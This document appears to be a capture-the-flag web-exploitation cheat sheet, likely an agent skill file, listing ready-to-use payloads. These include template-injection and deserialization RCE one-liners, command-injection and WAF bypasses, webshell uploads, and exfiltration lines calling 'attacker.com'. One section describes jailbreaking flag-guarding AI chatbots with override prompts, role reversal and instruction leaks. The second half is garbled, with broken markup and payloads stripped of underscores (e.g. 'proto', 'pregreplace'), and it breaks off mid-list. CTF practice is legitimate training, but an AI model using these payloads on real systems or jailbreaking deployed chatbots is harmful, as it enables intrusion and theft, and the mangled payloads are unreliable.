CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Prerequisites

Python packages (all platforms):
CODEBLOCK0

Linux (apt):
CODEBLOCK1

macOS (Homebrew):
CODEBLOCK2

Go tools (all platforms, requires Go):
CODEBLOCK3

Manual install:

- ysoserial — GitHub, requires Java (Java deserialization payloads)

Additional Resources

- sql-injection.md - SQL injection techniques: backslash/hex bypass, second-order SQLi, LIKE brute-force, MySQL column truncation, SQLi→SSTI chain, processList trick, XML entity WAF bypass, EXIF metadata injection, Shift-JIS encoding bypass, QR code input injection, double-keyword filter bypass, MySQL session variable dual-value injection, PHP PCRE backtrack WAF bypass, processlist race condition leak
server-side.md - Core server-side injection attacks: SSTI (Jinja2, Go, EJS, ERB Sequel bypass, Mako, Twig, __dict__.update() quote bypass), Python str.format() attribute traversal, SSRF (Host header, DNS rebinding, curl redirect), XXE, XML injection via X-Forwarded-For header, command injection (newline, blocklist bypass, sendmail, multi-barcode, git CLI newline injection), PHP type juggling, PHP file inclusion / php://filter, GraphQL injection (introspection, query batching/aliasing, string interpolation)
server-side-exec.md - Code execution and server-side access attacks: Ruby/Perl/JS code injection, LaTeX injection RCE, PHP pregreplace /e RCE, PHP backtick eval under character limit, PHP assert() injection, Prolog injection, ReDoS timing oracle, file upload→RCE (.htaccess, log poisoning, Python .so hijack, Gogs symlink, ZipSlip), PHP deserialization from cookies, PHP extract() variable overwrite, XPath blind injection, API filter injection, HTTP response header hiding, WebSocket mass assignment, Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF bypass
server-side-exec-2.md - Code execution and server-side access attacks (Part 2): SQLi keyword fragmentation bypass, SQL WHERE ORDER BY bypass, SQL injection via DNS records, bash brace expansion space-free injection, Common Lisp #.() reader macro injection, PHP7 OPcache binary webshell + LDPRELOAD disablefunctions bypass, wget GET parameter filename trick, tar filename command injection, PNG/PHP polyglot upload + double extension + disablefunctions bypass, editor backup file source disclosure, date -f arbitrary file read, Apache modrewrite PATHINFO bypass, PHP ReDoS code execution skip
server-side-deser.md - Deserialization and execution attacks: Java deserialization (ysoserial gadget chains, JNDI injection, blind detection), Python pickle RCE (__reduce__, restricted unpickler bypass, STOP opcode chaining), PHP serialization length manipulation via filter word expansion, race conditions (TOCTOU async exploits, double-spend, coupon reuse)
server-side-advanced.md - Advanced server-side techniques: ExifTool CVE-2021-22204, Go rune/byte mismatch, zip symlink traversal, path traversal bypasses (brace stripping, double URL encoding, os.path.join, %2f), /dev/fd symlink to bypass /proc filter, Flask/Werkzeug debug mode, XXE external DTD filter bypass, WeasyPrint SSRF, MongoDB regex injection, Pongo2 Go template injection, ZIP PHP webshell, basename() bypass, React Server Components Flight RCE (CVE-2025-55182)
server-side-advanced-2.md - Advanced server-side techniques (Part 2): SSRF to Docker API RCE chain, Castor XML xsi:type deserialization (Atlas HTB), Apache ErrorDocument expression file read (Zero HTB), SQLite file path traversal to bypass string equality, HQL injection via non-breaking space, base64-encoded path traversal, Windows 8.3 short filename bypass, URL parseurl @ symbol bypass, PHP zip:// wrapper LFI via PNG/ZIP polyglot, XSS to SSTI chain via Flask error pages, INSERT INTO dual-field SQLi column shift, session cookie forgery via timestamp-seeded PRNG, SSRF via parseurl/curl double-@ URL parsing discrepancy, LaTeX RCE via mpost restricted write18 bypass, ElasticSearch Groovy scriptfields RCE via SSRF
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements, XS-Leak timing oracle, GraphQL CSRF, admin bot javascript: URL scheme bypass, AngularJS 1.x sandbox escape via charAt/trim override, shadow DOM XSS, DOM clobbering, HTTP request smuggling, JPEG+HTML polyglot XSS, JSFuck decoding, CSS/JS paywall bypass
client-side-advanced.md - Advanced client-side attacks: Unicode case folding XSS bypass (long-s U+017F), CSS font glyph container query exfiltration, Hyperscript CDN CSP bypass, PBKDF2 prefix timing oracle, client-side HMAC bypass via leaked JS secret, terminal control character obfuscation, CSP bypass via cloud function whitelisted domain, CSP nonce bypass via base tag hijacking, XSSI via JSONP callback exfiltration, CSP bypass via link prefetch, cross-origin XSS via shared parent domain cookie injection, Chrome Unicode URL normalization bypass, XSS dot-filter bypass via decimal IP and bracket notation
auth-and-access.md - Auth/authz attacks: password inference, weak validation, client-side gates, NoSQL auth bypass, cookie manipulation, admin login route cookie seeding, host header bypass, always-true hash check, affine cipher OTP brute-force, /proc/self/mem via HTTP Range requests, custom linear MAC forgery, hidden API endpoints, HAProxy/Express.js bypass, IDOR on WIP endpoints, HTTP TRACE method bypass, LLM/AI chatbot jailbreak, LLM safety model category gaps, open redirect chains (OAuth token theft), subdomain takeover, Apache modstatus info disclosure + session forging, JA4/JA4H TLS fingerprint matching
auth-jwt.md - JWT/JWE token attacks: algorithm none, RS256→HS256 confusion, weak secret, unverified signature, JWK/JKU header injection, KID path traversal, balance replay, JWE forgery with exposed public key
auth-infra.md - Infrastructure auth: OAuth/OIDC exploitation (redirecturi bypass, token manipulation, state CSRF), CORS misconfiguration, git history credential leakage, CI/CD variable theft, identity provider API takeover (authentik/Keycloak), SAML SSO flow automation, Guacamole parameter extraction, login page poisoning, TeamCity REST API RCE, base64 decode leniency signature bypass
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE, Lodash+Pug AST injection
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, transient storage clearing collision (0.8.28-0.8.33), Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass, Chrome referrer leak via Link header, TCP packet splitting firewall bypass, Puppeteer JS bypass, python-dotenv injection, HTTP request splitting (RFC 2047), Waitress WSGI cookie exfil, Deno import map hijack, Gogs symlink RCE (CVE-2025-8110), ExifTool DjVu, broken auth, AAEncode/JJEncode, protocol multiplexing, WeasyPrint attachment SSRF (CVE-2024-28184), React Server Components Flight RCE (CVE-2025-55182), Ruby-SAML XPath digest smuggling (CVE-2024-45409, Barrier HTB), PaperCut NG auth bypass + RCE (CVE-2023-27350, Bamboo HTB), Zabbix blind SQLi (CVE-2024-22120, Watcher HTB)

When to Pivot

- If the target is a native binary, custom VM, or firmware image, switch to /ctf-reverse first.
If the HTTP bug only gives you code execution and the hard part becomes memory corruption or seccomp escape, switch to /ctf-pwn.
If the "web" challenge really turns on JWT math, custom MACs, or crypto primitives, switch to /ctf-crypto.
If the web challenge involves analyzing logs, PCAPs, or recovering artifacts from a web server, switch to /ctf-forensics.
If the challenge requires gathering intelligence from public web sources, DNS records, or social media before exploitation, switch to /ctf-osint.

Quick Start Commands

CODEBLOCK4

Reconnaissance

- View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /debug, /.git/, INLINECODE15
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed
Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)
Check assets returning 404 status — favicon.ico, robots.txt may contain data despite error codes: INLINECODE19
Tor hidden services: INLINECODE20

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

CODEBLOCK5

WAF bypasses: XML entity encoding (UNION), EXIF metadata injection (exiftool -Comment="' UNION SELECT..."), Shift-JIS \u00a5→0x5c backslash, QR code payload injection, double-keyword nesting (selselectect). See sql-injection.md for all techniques.

MySQL session variable dual-value injection: @var:= assigns return different values across sequential queries in one connection. PHP PCRE backtrack limit WAF bypass: 1M+ chars cause preg_match() to return false, passing !false. information_schema.processlist race condition leaks secrets from concurrent queries. See sql-injection.md.

See server-side-exec.md for PHP pregreplace /e RCE and Prolog injection. See server-side-exec-2.md for SQLi via DNS records and SQLi keyword fragmentation.

XSS Quick Reference

CODEBLOCK6

Filter bypass: hex \x3cscript\x3e, entities <script>, case mixing <ScRiPt>, event handlers.

- XSS dot-filter bypass: Decimal IP (1558071511 = 92.123.45.67) eliminates dots from URLs. JavaScript bracket notation (document["cookie"]) replaces dot property access. See client-side-advanced.md.
Cross-origin cookie XSS: Set cookie with domain=.parent.tld from one subdomain to inject XSS payload rendered on a sibling subdomain. See client-side-advanced.md.
AngularJS 1.x sandbox escape: Override String.prototype.charAt with trim to bypass AngularJS expression sandbox, then $eval arbitrary JS. See client-side.md.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

XSSI via JSONP Callback Exfiltration

JSONP endpoint (?callback=func) wraps sensitive data in a function call. Load cross-origin via <script src> with custom callback to exfiltrate. Chain: SHA1 cookie inversion -> IDOR on debug endpoint -> XSSI -> cloud function OOB. See client-side-advanced.md.

Path Traversal / LFI Quick Reference

CODEBLOCK7

Windows 8.3 short filename bypass: FILEFO~1.EXT short names bypass path filters that check the long filename. See server-side-advanced-2.md.

URL parseurl @ bypass: http://valid@attacker.com/ -- PHP parse_url() extracts attacker.com as host, bypassing domain checks. See server-side-advanced-2.md.

- SSRF double-@ parse discrepancy: http://x:x@127.0.0.1:80@allowed.host/path — parse_url() sees allowed.host, curl connects to 127.0.0.1. Distinct from single-@ bypass. See server-side-advanced-2.md.

/dev/fd symlink bypass: When /proc is blacklisted, use /dev/fd/../environ -- /dev/fd symlinks to /proc/self/fd, so ../ reaches /proc/self/. See server-side-advanced.md.

Python footgun: os.path.join('/app/public', '/etc/passwd') returns INLINECODE59

JWT Quick Reference

1. alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey, .env, INLINECODE63
Balance replay — save JWT, spend, replay old JWT, return items for profit
Unverified signature — modify payload, keep original signature
JWK header injection — embed attacker public key in token header
JKU header injection — point to attacker-controlled JWKS URL
KID path traversal — ../../../dev/null for empty key, or SQL injection in KID

See auth-jwt.md for full JWT/JWE attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns INLINECODE66

CODEBLOCK8

Mako SSTI (Python): ${__import__('os').popen('id').read()} — no sandbox, plain Python inside ${} or <% %>. Twig SSTI (PHP): {{['id']|map('system')|join}} — distinguish from Jinja2 via {{7*'7'}} (Twig repeats string, Jinja2 returns 49). See server-side.md and server-side.md.

Quote filter bypass: Use __dict__.update(key=value) — keyword arguments need no quotes. See server-side.md.

ERB SSTI (Ruby/Sinatra): <%= Sequel::DATABASES.first[:table].all %> bypasses ERBSandbox variable-name restrictions via the global Sequel::DATABASES array. See server-side.md.

Python str.format() Attribute Traversal (PlaidCTF 2017)

Python str.format() allows dot-notation attribute traversal ({0.attr.subattr}) and bracket indexing ({0[key]}). When user input reaches .format(obj), leak arbitrary attributes without a template engine. Distinct from SSTI. See server-side.md.

Thymeleaf SpEL SSTI (Java/Spring): ${T(org.springframework.util.FileCopyUtils).copyToByteArray(new java.io.File("/flag.txt"))} reads files via Spring utility classes when standard I/O is WAF-blocked. Works in distroless containers (no shell). See server-side-exec.md.

SSRF Quick Reference

CODEBLOCK9

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Host header SSRF: Server builds internal request URL from Host header (e.g., http.Get("http://" + request.Host + "/validate")). Set Host to attacker domain → validation request goes to attacker server. See server-side.md.

ElasticSearch Groovy RCE via SSRF: SSRF to internal ES on port 9200 enables RCE through script_fields Groovy scripting (pre-5.0). See server-side-advanced-2.md.

Command Injection Quick Reference

CODEBLOCK10

When cat/head blocked: sed -n p flag.txt, awk '{print}', INLINECODE85

Bash brace expansion (space-free injection): {ls,-la,..} expands to ls -la .. without literal spaces. See server-side-exec-2.md.

Git CLI newline injection: %0a in URL path breaks out of backtick/system() shell calls that only filter ;|&<>. See server-side.md.

XXE Quick Reference

CODEBLOCK11

PHP filter: INLINECODE90

XXE in DOCX uploads: DOCX is ZIP+XML; inject XXE in [Content_Types].xml inside the archive. See server-side.md.

PHP Type Juggling Quick Reference

Loose == performs type coercion: 0 == "string" is true, "0e123" == "0e456" is true (magic hashes). Send JSON integer 0 to bypass string password checks. strcmp([], "str") returns NULL which passes !strcmp(). Use === for defense.

See server-side.md for comparison table and exploit payloads.

PHP File Inclusion / LFI Quick Reference

INLINECODE102 leaks PHP source code without execution. Common LFI targets: /etc/passwd, /proc/self/environ, app config files. Null byte (%00) truncates .php suffix on PHP < 5.3.4.

See server-side.md for filter chains and RCE techniques.

Code Injection Quick Reference

Ruby instance_eval: Break string + comment: VALID');INJECTED_CODE#
Perl open(): 2-arg open allows pipe: |command|
JS eval blocklist bypass: row['con'+'structor']['con'+'structor']('return this')()
PHP deserialization: Craft serialized object in cookie → LFI/RCE
LaTeX injection: \input{|"cat /flag.txt"} — shell command via pipe syntax in PDF generation services. \@@input"/etc/passwd" for file reads without shell.

- LaTeX restricted write18 bypass: When write18 is restricted, mpost -ini "-tex=bash -c (cmd)" file.mp uses mpost's whitelisted status to execute arbitrary commands. ${IFS} replaces spaces. See server-side-advanced-2.md.

PHP backtick eval (character limit): ` echocat ; -- PHP backticks = shellexec(), fits RCE in as few as 8 chars. Use $GET[0]; to move payload to URL parameter. See [server-side-exec.md](server-side-exec.md#php-backtick-eval-under-character-limit-easyctf-2017). **PHP assert() injection:**assert("strpos('$input', '..') === false") — inject ') || system('cmd');//for RCE (PHP < 7.2). See [server-side-exec.md](server-side-exec.md#php-assert-string-evaluation-injection-csaw-ctf-2016). **Common Lispread injection:** #.(run-shell-command "cat /flag")— reader macro evaluates at parse time. See [server-side-exec-2.md](server-side-exec-2.md#common-lisp-injection-via-reader-macro-insomnihack-2016). **Ruby ObjectSpace scanning:**ObjectSpace.eachobject(String)dumps all in-memory strings including flag. See [server-side-exec.md](server-side-exec.md#ruby-objectspace-memory-scanning-for-flag-extraction-tokyo-westerns-2016). See [server-side-exec.md](server-side-exec.md) for full payloads and bypass techniques. ## Java Deserialization Serialized Java objects (rO0AB / aced0005) + ysoserial gadget chains → RCE via ObjectInputStream.readObject(). Try CommonsCollections1-7, URLDNSfor blind detection. See [server-side-deser.md](server-side-deser.md#java-deserialization-ysoserial). ## Python Pickle Deserializationpickle.loads() calls reduce() → (os.system, ('cmd',)) instant RCE. Also via yaml.load(), torch.load(), joblib.load(). See [server-side-deser.md](server-side-deser.md#python-pickle-deserialization). ## Race Conditions (TOCTOU) Concurrent requests bypass check-then-act patterns (balance, coupons, registration). Send 50 simultaneous requests — all see pre-modification state. See [server-side-deser.md](server-side-deser.md#race-conditions-toctou). ## Node.js Quick Reference **Prototype pollution:**{"proto": {"isAdmin": true}}or flatnest circular ref bypass **VM escape:**this.constructor.constructor("return process")()→ RCE **Full chain:** pollution → enable JS eval in Happy-DOM → VM escape → RCE **Prototype pollution permission bypass:**{"proto":{"isAdmin":true}} on JSON endpoints pollutes Object.prototype. Always try protoinjection even when the vulnerability seems like something else. See [node-and-prototype.md](node-and-prototype.md) for detailed exploitation. ## Auth & Access Control Quick Reference - Cookie manipulation:role=admin, isAdmin=true- Public admin-login cookie seeding: check if/admin/loginsets reusable admin session cookie - Host header bypass:Host: 127.0.0.1- Hidden endpoints: search JS bundles for/api/internal/, /api/admin/; fuzz with auth cookie for non-/api routes like /internal/- Client-side gates:window.overrideAccess = trueor call API directly - Password inference: profile data + structured ID format → brute-force - Weak signature: check if only first N chars of hash are validated - Affine cipher OTP: only 312 possible values (12 mults × 26 adds), brute-force all in seconds - TOTP srand(time()) weakness: sync server clock to predict codes. See [auth-and-access.md](auth-and-access.md#totp-recovery-via-php-srandtime-seed-weakness-tum-ctf-2016) - Express.js%2Fmiddleware bypass, IDOR on WIP endpoints, git history credential leakage - CI/CD variable theft, identity provider API takeover (bypass MFA:notconfiguredaction: skip) - SAML SSO automation, Guacamole parameter extraction, login page poisoning, TeamCity REST API RCE ## Apache CVE-2012-0053 HttpOnly Cookie Leak Send oversizedCookieheader to trigger 400 Bad Request; Apache's error page reflects the cookie value, leaking HttpOnly cookies. See [cves.md](cves.md#cve-2012-0053-apache-httponly-cookie-leak-via-400-bad-request-rc3-ctf-2016). ## Apache mod_status Information Disclosure/server-statusendpoint reveals active URLs, client IPs, and session data. Use for admin endpoint discovery and session forging. See [auth-and-access.md](auth-and-access.md#apache-modstatus-information-disclosure-session-forging-29c3-ctf-2012). ## Open Redirect Chains Chain open redirects (?redirect=, ?next=, ?url=) with OAuth flows for token theft. Bypass validation with @, %00, //, \, CRLF. See [auth-and-access.md](auth-and-access.md#open-redirect-chains). ## Subdomain Takeover Dangling CNAME → claim resource on external service (GitHub Pages, S3, Heroku). Usesubfinder + httpxto enumerate, check fingerprints. See [auth-and-access.md](auth-and-access.md#subdomain-takeover). See [auth-and-access.md](auth-and-access.md) for access control bypasses, [auth-jwt.md](auth-jwt.md) for JWT/JWE attacks, and [auth-infra.md](auth-infra.md) for OAuth/SAML/CI-CD/infrastructure auth. ## File Upload → RCE -.htaccess upload: AddType application/x-httpd-php .lol+ webshell - Gogs symlink: overwrite.git/config with core.sshCommandRCE - Python.so hijack: write malicious shared object + delete .pycto force reimport - ZipSlip: symlink in zip for file read, path traversal for file write - Log poisoning: PHP payload in User-Agent + path traversal to include log - PNG/PHP polyglot + double extension: valid PNG with after IEND chunk, uploaded as .png.php; when disablefunctions blocks exec, use scandir('/') + filegetcontents()for flag. See [server-side-exec-2.md](server-side-exec-2.md#pngphp-polyglot-upload-double-extension-disablefunctions-bypass-metactf-flash-2026). See [server-side-exec.md](server-side-exec.md) and [server-side-exec-2.md](server-side-exec-2.md) for detailed steps. ## Multi-Stage Chain Patterns **0xClinic chain:** Password inference → path traversal + ReDoS oracle (leak secrets from/proc/1/environ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → .sowrite via path traversal → RCE **Key chaining insights:** - Path traversal + any file-reading primitive → leak/proc//environ, /proc//cmdline- CRLF in headers → CSP bypass + cache poisoning + XSS in one shot - Arbitrary file write in Python →.so hijacking or .pycoverwrite for RCE - Lowercased response body → use hex escapes (\x3c for <) ## Flask/Werkzeug Debug Mode Weak session secret brute-force + forge admin session + Werkzeug debugger PIN RCE. See [server-side-advanced.md](server-side-advanced.md#flaskwerkzeug-debug-mode-exploitation) for full attack chain. ## XXE with External DTD Filter Bypass Host malicious DTD externally to bypass upload keyword filters. See [server-side-advanced.md](server-side-advanced.md#xxe-with-external-dtd-filter-bypass) for payload and webhook.site setup. ## JSFuck Decoding Remove trailing()(), eval in Node.js, .toString()reveals original code. See [client-side.md](client-side.md#jsfuck-decoding). ## DOM XSS via jQuery Hashchange (Crypto-Cat)$(location.hash) + hashchange event → XSS via iframe: '"><code>. See [client-side.md](client-side.md#dom-xss-via-jquery-hashchange-crypto-cat). ## Shadow DOM XSS Proxy </code>attachShadow<code> to capture closed roots; </code>(0,eval)<code> for scope escape; </code></script><code> injection. See [client-side.md](client-side.md#shadow-dom-xss). ## DOM Clobbering + MIME Mismatch </code>.jpg<code> served as </code>text/html<code>; </code><form id="config"><code> clobbers JS globals. See [client-side.md](client-side.md#dom-clobbering-mime-mismatch). ## HTTP Request Smuggling via Cache Proxy Cache proxy desync for cookie theft via incomplete POST body. See [client-side.md](client-side.md#http-request-smuggling-via-cache-proxy). ## Path Traversal: URL-Encoded Slash Bypass </code>%2f<code> bypasses nginx route matching but filesystem resolves it. See [server-side-advanced.md](server-side-advanced.md#path-traversal-url-encoded-slash-bypass). ## WeasyPrint SSRF & File Read (CVE-2024-28184) </code><a rel="attachment" href="file:///flag.txt"><code> or </code><link rel="attachment" href="http://127.0.0.1/admin"><code> -- WeasyPrint embeds fetched content as PDF attachments, bypassing header checks. Boolean oracle via </code>/Type /EmbeddedFile<code> presence. See [server-side-advanced.md](server-side-advanced.md#weasyprint-ssrf-file-read-cve-2024-28184-nullcon-2026) and [cves.md](cves.md#cve-2024-28184-weasyprint-attachment-ssrf-file-read). ## MongoDB Regex / $where Blind Injection Break out of </code>/.../i<code> with </code>a^/)||(<condition>)&&(/a^<code>. Binary search </code>charCodeAt()<code> for extraction. See [server-side-advanced.md](server-side-advanced.md#mongodb-regex-injection-where-blind-oracle-nullcon-2026). ## Pongo2 / Go Template Injection </code>{% include "/flag.txt" %}<code> in uploaded file + path traversal in template parameter. See [server-side-advanced.md](server-side-advanced.md#pongo2-go-template-injection-via-path-traversal-nullcon-2026). ## ZIP Upload with PHP Webshell Upload ZIP containing </code>.php<code> file → extract to web-accessible dir → </code>file<em>get</em>contents('/flag.txt')<code>. See [server-side-advanced.md](server-side-advanced.md#zip-upload-with-php-webshell-nullcon-2026). ## basename() Bypass for Hidden Files </code>basename()<code> only strips dirs, doesn't filter </code>.lock<code> or hidden files in same directory. See [server-side-advanced.md](server-side-advanced.md#basename-bypass-for-hidden-files-nullcon-2026). ## Custom Linear MAC Forgery Linear XOR-based signing with secret blocks → recover from known pairs → forge for target. See [auth-and-access.md](auth-and-access.md#custom-linear-macsignature-forgery-nullcon-2026). ## CSS/JS Paywall Bypass Content behind CSS overlay (</code>position: fixed; z-index: 99999<code>) is still in the raw HTML. </code>curl<code> or view-source bypasses it instantly. See [client-side.md](client-side.md#cssjs-paywall-bypass). ## SSRF → Docker API RCE Chain SSRF to unauthenticated Docker daemon on port 2375. Use </code>/archive<code> for file extraction, </code>/exec<code> + </code>/exec/{id}/start<code> for command execution. Chain through internal POST relay when SSRF is GET-only. See [server-side-advanced-2.md](server-side-advanced-2.md#ssrf-to-docker-api-rce-chain-h7ctf-2025). ## Castor XML Deserialization via xsi:type (Atlas HTB) Castor XML </code>Unmarshaller<code> without mapping file trusts </code>xsi:type<code> attributes for arbitrary Java class instantiation. Chain through JNDI (Java Naming and Directory Interface) / RMI (Remote Method Invocation) via ysoserial </code>CommonsBeanutils1<code> for RCE. Requires Java 11 (not 17+). Check </code>pom.xml<code> for </code>castor-xml<code>. See [server-side-advanced-2.md](server-side-advanced-2.md#castor-xml-deserialization-via-xsitype-polymorphism-atlas-htb). ## Apache ErrorDocument Expression File Read (Zero HTB) </code>.htaccess<code> with </code>ErrorDocument 404 "%{file:/etc/passwd}"<code> reads files at Apache level, bypassing </code>php<em>admin</em>flag engine off<code>. Requires </code>AllowOverride FileInfo<code>. Upload via SFTP, trigger with 404 request. See [server-side-advanced-2.md](server-side-advanced-2.md#apache-errordocument-expression-file-read-zero-htb). ## HTTP TRACE Method Bypass Endpoints returning 403 on GET/POST may respond to TRACE, PUT, PATCH, or DELETE. Test with </code>curl -X TRACE<code>. See [auth-and-access.md](auth-and-access.md#http-trace-method-bypass-bypass-ctf-2025). ## LLM/AI Chatbot Jailbreak AI chatbots guarding flags can be bypassed with system override prompts, role-reversal, or instruction leak requests. Rotate session IDs and escalate prompt severity. See [auth-and-access.md](auth-and-access.md#llmai-chatbot-jailbreak-bypass-ctf-2025). ## Admin Bot javascript: URL Scheme Bypass </code>new URL()<code> validates syntax only, not protocol — </code>javascript:<code> URLs pass and execute in Puppeteer's authenticated context. CSP/SRI on the target page are irrelevant since JS runs in navigation context. See [client-side.md](client-side.md#admin-bot-javascript-url-scheme-bypass-dicectf-2026). ## XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty) HTML injection → meta refresh redirect (CSP bypass) → admin bot loads attacker page → JavaScript makes cross-origin GET requests to </code>localhost<code> GraphQL endpoint via </code>new Image().src<code> → measures time-based SQLi (</code>SLEEP(1)<code>) through image error timing → character-by-character flag exfiltration. GraphQL GET requests bypass CORS preflight. See [client-side.md](client-side.md#xs-leak-via-image-load-timing-graphql-csrf-htb-grandmonty). ## React Server Components Flight Protocol RCE (Ehax 2026) Identify via </code>Next-Action<code> + </code>Accept: text/x-component<code> headers. CVE-2025-55182: fake Flight chunk exploits constructor chain for server-side JS execution. Exfiltrate via </code>NEXT<em>REDIRECT<code> error → </code>x-action-redirect<code> header. WAF bypass: </code>'chi'+'ld</em>pro'+'cess'<code> or hex </code>'\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'<code>. See [server-side-advanced.md](server-side-advanced.md#react-server-components-flight-protocol-rce-ehax-2026) and [cves.md](cves.md#cve-2025-55182-cve-2025-66478-react-server-components-flight-protocol-rce). ## Unicode Case Folding XSS Bypass (UNbreakable 2026) **Pattern:** Sanitizer regex uses ASCII-only matching (</code><\s<em>script<code>), but downstream processing applies Unicode case folding (</code>strings.EqualFold<code>). </code><ſcript><code> (U+017F Latin Long S) bypasses regex but folds to </code><script><code>. Other pairs: </code>ı<code>→</code>i<code>, </code>K<code> (U+212A)→</code>k<code>. See [client-side-advanced.md](client-side-advanced.md#unicode-case-folding-xss-bypass-unbreakable-2026). ## CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026) **Pattern:** Exfiltrate inline text via CSS injection (no JS). Custom font assigns unique glyph widths per character. Container queries match width ranges to fire background-image requests -- one request per character. Works under strict CSP. See [client-side-advanced.md](client-side-advanced.md#css-font-glyph-width-container-query-exfiltration-unbreakable-2026). ## Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026) **Pattern:** CSP allows </code>cdnjs.cloudflare.com<code>. Load Hyperscript (</code><em>=<code> attributes) or Alpine.js (</code>x-data<code>, </code>x-init<code>) from CDN -- they execute code from HTML attributes that sanitizers don't strip. See [client-side-advanced.md](client-side-advanced.md#hyperscript-cdn-csp-bypass-unbreakable-2026). ## Solidity Transient Storage Clearing Collision (0.8.28-0.8.33) **Pattern:** Solidity IR pipeline (</code>--via-ir<code>) generates identically-named Yul helpers for </code>delete<code> on persistent and transient variables of the same type. One uses </code>sstore<code>, the other should use </code>tstore<code>, but deduplication picks only one. Exploits: overwrite </code>owner<code> (slot 0) via transient </code>delete<code>, or make persistent </code>delete<code> (revoke approvals) ineffective. Workaround: use </code></em>lock = address(0)<code> instead of </code>delete <em>lock<code>. See [web3.md](web3.md#solidity-transient-storage-clearing-helper-collision-solidity-0828-0833). ## Chrome Unicode URL Normalization Bypass (RCTF 2017) Chrome's IDNA/punycode normalization converts fullwidth Unicode characters (U+FF00-U+FF5E) to ASCII equivalents, bypassing length checks and character filters on domain names. See [client-side-advanced.md](client-side-advanced.md#chrome-unicode-url-normalization-bypass-rctf-2017). ## CSP Nonce Bypass via base Tag Hijacking (BSidesSF 2026) **Pattern:** CSP uses </code>script-src 'nonce-xxx'<code> but missing </code>base-uri<code> directive. Inject </code><base href="https://attacker.com/"><code> before a nonced </code><script src="relative.js"><code> -- script loads from attacker server but satisfies CSP via the valid nonce. Defense: always include </code>base-uri 'self'<code>. See [client-side-advanced.md](client-side-advanced.md#csp-nonce-bypass-via-base-tag-hijacking-bsidessf-2026). ## JA4/JA4H TLS Fingerprint Matching (BSidesSF 2026) **Pattern:** Server validates browser identity via JA4 (TLS ClientHello fingerprint) and JA4H (HTTP header ordering fingerprint) in addition to User-Agent. Spoofing UA alone fails; must match the target browser's TLS cipher suite order and HTTP header sequence. For legacy browsers, run the actual browser. See [auth-and-access.md](auth-and-access.md#ja4ja4h-tls-and-http-fingerprint-matching-bsidessf-2026). ## Client-Side HMAC Bypass via Leaked JS Secret (Codegate 2013) Deobfuscate client-side JS to extract hardcoded HMAC secret, then forge signatures for arbitrary requests via browser console. See [client-side-advanced.md](client-side-advanced.md#client-side-hmac-bypass-via-leaked-js-secret-codegate-2013). ## SQLi Keyword Fragmentation Bypass (SecuInside 2013) Single-pass </code>preg</em>replace()<code> keyword filters bypassed by nesting the stripped keyword inside the payload: </code>unload<em>fileon<code> → </code>union<code> after </code>load</em>file<code> removal. See [server-side-exec-2.md](server-side-exec-2.md#sqli-keyword-fragmentation-bypass-secuinside-2013). ## Pickle Chaining via STOP Opcode Stripping (VolgaCTF 2013) Strip pickle STOP opcode (</code>\x2e<code>) from first payload, concatenate second — both </code><strong>reduce</strong><code> calls execute in single </code>pickle.loads()<code>. Chain </code>os.dup2()<code> for socket output. See [server-side-deser.md](server-side-deser.md#pickle-chaining-via-stop-opcode-stripping-volgactf-2013). ## XPath Blind Injection (BaltCTF 2013) </code>substring(normalize-space(../../../node()),1,1)='a'<code> — boolean-based blind extraction from XML data stores via response length oracle. See [server-side-exec.md](server-side-exec.md#xpath-blind-injection-baltctf-2013). ## SQLite File Path Traversal to Bypass String Equality (Codegate 2013) Input </code>/../gamesim<em>GM<code> fails </code>== "GM"<code> string check but filesystem normalizes </code>/var/game</em>db/gamesim<em>/../gamesim</em>GM.db<code> to the blocked path. See [server-side-advanced-2.md](server-side-advanced-2.md#sqlite-file-path-traversal-to-bypass-string-equality-codegate-2013). ## PHP Serialization Length Manipulation via Filter Word Expansion (0CTF 2016) Post-serialization string filter replaces "where" (5 chars) with "hacker" (6 chars). Repeat "where" N times so expansion overflows by exactly enough bytes to inject a serialized field (</code>";}s:5:"photo";s:10:"config.php";}<code>). See [server-side-deser.md](server-side-deser.md#php-serialization-length-manipulation-via-filter-word-expansion-0ctf-2016). ## CSP Bypass via link prefetch (Boston Key Party 2016) </code><link rel="prefetch" href="http://attacker.com/steal"><code> not blocked by CSP </code>script-src<code>. Also: </code><meta http-equiv="refresh"><code>. Scriptless data exfiltration. See [client-side-advanced.md](client-side-advanced.md#csp-bypass-via-link-prefetch-boston-key-party-2016). ## XML Injection via X-Forwarded-For Header (Pwn2Win 2016) Server builds XML from headers without escaping. Inject </code></ip><admin>true</admin><ip><code> via X-Forwarded-For; first-tag-wins XML parsing. See [server-side.md](server-side.md#xml-injection-via-x-forwarded-for-header-pwn2win-2016). ## Base64 Decode Leniency and Parameter Override for Signature Bypass (BCTF 2016) </code>b64decode()<code> silently ignores non-base64 chars. Append </code>&price=0<code> after signature -- b64decode strips it, but parameter parser processes it (last value wins). See [auth-infra.md](auth-infra.md#base64-decode-leniency-and-parameter-override-for-signature-bypass-bctf-2016). ## Common Flag Locations Files: </code>/flag.txt<code>, </code>/flag<code>, 